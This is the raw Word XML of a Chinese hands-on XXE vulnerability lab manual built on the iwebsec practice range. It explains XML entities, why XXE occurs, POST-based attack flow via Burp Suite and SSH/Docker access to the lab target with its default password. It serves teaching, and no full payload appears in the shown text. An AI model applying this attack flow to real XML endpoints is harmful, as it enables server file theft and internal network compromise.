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2CFD2">
      <w:pPr>
        <w:spacing w:before="480" w:after="480" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>XXE漏洞实操手册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795144AA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一、实验环境配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="45AD6DF2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攻击机（Kali）：192.168.44.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5F8D7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靶机（iwebsec）：192.168.44.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B980C1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漏洞测试地址：http://192.168.44.128/xxe/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAB883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测试静态XML地址：http://192.168.44.128/test_xxe/book.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B15AD3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抓包工具：Burp Suite（默认监听 127.0.0.1:8080）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B0C9C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二、XML核心原理（基础铺垫）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7971B59E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2.1 XML核心定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="48AEEA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XML（可扩展标记语言）是一种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>结构化纯文本数据传输格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，核心作用为存储、传输结构化数据，无页面渲染功能，广泛应用于接口交互、配置文件、数据同步等业务场景。与HTML的核心区别：HTML专注页面展示，XML专注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据结构化传输</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4ADA5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2.2 XML标准三层结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="63BE26F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合法的XML文档由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>XML声明、DTD文档约束、元素节点数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>三部分组成，缺一不可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468148B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XML声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：文档首行，定义版本与编码，固定格式 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A92B6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DTD文档类型定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：约束标签结构、数据类型，核心作用是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>定义实体变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，分为内部DTD（文档内生效）和外部DTD（引用外部资源，XXE漏洞核心入口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42763644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元素节点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：承载业务数据，语法严格，必须闭合、无交叉嵌套、大小写敏感</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A411EC4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2.3 XML实体核心机制（漏洞前置核心）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2D2253A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XML实体本质是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>解析器全局替换变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，分为两种，是XXE漏洞利用的核心基础：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F8383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内部实体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：仅当前文档生效，格式 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;!ENTITY 变量名 "固定内容"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;变量名;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用替换文本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67808980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外部实体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：支持调用外部资源，格式 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;!ENTITY 变量名 SYSTEM "协议://资源地址"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，解析器会主动发起请求/读取文件，支持 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>php://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>expect://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等高危协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07920299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三、底层原理深度剖析（XXE漏洞根源）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="37D603AC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3.1 XXE完整定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6A529A2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XXE（XML External Entity Injection，XML外部实体注入），是由于Web应用接收用户可控的XML数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>XML解析器默认开启外部实体解析、无安全过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，导致攻击者可构造恶意外部实体，利用解析器权限读取服务器文件、探测内网、发起内网攻击的高危漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254DA30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3.2 底层五大核心根源（深度剖析）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="00E23433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协议原生设计缺陷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：XML官方标准原生支持外部实体引用，设计初衷是复用DTD结构、实现数据共享，未做安全权限限制，为漏洞提供原生基础</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E214F81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解析器默认不安全配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：PHP7.2以下、低版本Java、Python等解析器，默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>全开外部实体加载权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无任何拦截，可直接操作服务器本地文件、内网服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DF49F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用户输入完全可控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：业务接口直接接收用户自定义XML数据包，攻击者可随意构造 DTD、ENTITY 恶意语法，完全控制解析器行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788ACF6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开发安全缺失</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：代码未手动禁用外部实体、未过滤 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DOCTYPE、ENTITY、SYSTEM、PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 恶意关键字，原始XML直接交给解析器执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EA09C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高危协议无管控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：解析器默认放行文件读取、网络请求、命令执行类伪协议，最大化漏洞危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12259B8E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3.3 XXE漏洞触发必备四大条件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="187789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四个条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时满足</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>即可触发高危XXE漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626AC1D5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业务接口接收用户可控XML数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E203DB6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XML解析器开启外部实体解析功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26722DFA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无恶意DTD、实体关键字过滤机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6B926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解析后的内容可回显或参与业务逻辑执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0642BB">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>四、API接口交互拓展知识（GET/POST深度对比+底层交互原理）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7B881E0B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4.1 XML接口API交互核心原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="29B192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传统企业接口、第三方对接、老旧后台系统普遍采用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>XML 数据格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 传输业务参数，区别于现代JSON接口。客户端通过HTTP协议将结构化XML数据提交至服务端，服务端识别 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Content-Type: application/xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求头后，调用专用XML解析器解析数据，完成业务逻辑处理与响应返回。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3E079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4.2 GET请求与POST请求底层区别（XXE攻击关键知识点）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0265F4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XXE漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只能通过POST请求利用，GET请求无法利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，核心底层差异如下：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49FBE21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0F3D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对比维度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D44D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GET 请求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E43C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POST 请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1972F3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2913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数据存放位置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C4DC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数据拼接在URL地址后，无请求体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889C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数据存放在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HTTP请求体（Body）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2977F71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17F4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数据长度限制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4CCF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浏览器、服务器存在URL长度限制，无法承载大段XML代码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02B4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无严格长度限制，可传输完整XML结构化数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="714D0E5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6992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Content-Type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1FBE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无请求头定义，默认纯文本参数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F7BE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 xml:space="preserve">可自定义 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>application/xml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 标识XML数据格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D4799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B63D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XXE利用可行性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9A77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不可利用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，无请求体承载XML恶意Payload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37A5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可直接利用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，完整承载恶意XML、DTD、实体代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="194F11B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FD3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数据传输特性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F22C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明文暴露在地址栏、历史记录中，不安全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937D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数据隐藏在请求体中，隐蔽性更强，适配接口数据传输</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70C6CFD8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4.3 本实验接口底层接收逻辑</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1D33E4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漏洞源码中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>file_get_contents('php://input')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是核心关键点：该函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只能读取POST请求的请求体数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无法读取GET URL参数。因此本XXE漏洞接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>仅支持POST恶意利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，GET请求仅能正常访问页面、无法植入Payload。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A885EF">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4.4 正常XML POST接口交互流程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="201150C7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客户端构造合规XML业务数据，请求头添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Content-Type: application/xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E81534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以POST方式将XML数据放入请求体，发送至靶机接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153489A1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服务端通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>php://input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>接收原始XML数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B05B0E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调用XML解析器解析结构化数据，执行业务逻辑并返回结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728AE4CD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4.5 恶意XML POST攻击交互流程（XXE核心攻击逻辑）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="72988E89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攻击者通过Burp拦截正常GET页面请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6378C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将请求方法改为POST，添加XML专属请求头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FE309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请求体植入带恶意DTD、外部实体的XML Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD8F2A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服务端无过滤、未禁用外部实体，解析器自动执行恶意实体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E2C9B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服务端读取本地文件/访问内网资源，将结果回显至前端，漏洞利用成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1172F354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等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4.6 XML接口安全风险总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7C2F89E1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所有支持 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Content-Type: application/xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的POST接口，是XXE漏洞高发入口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD924BF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GET接口无请求体，天然无法承载复杂XML恶意代码，无XXE利用条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5340A2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接口未禁用外部实体、未过滤关键字，会直接导致服务器信息泄露、内网沦陷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34502B7D">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>五、任务8.1 认识XML基础实操</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7F0C139F">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5.1 靶机远程连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="3CA261C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攻击机Kali（192.168.44.129）终端执行以下命令连接靶机：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013B387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E04375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ssh iwebsec@192.168.44.128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登录密码：iwebsec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进入靶场Docker容器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docker exec -it bc23 /bin/bash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# 进入网站根目录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cd /var/www/html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4080A401">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_18"/>
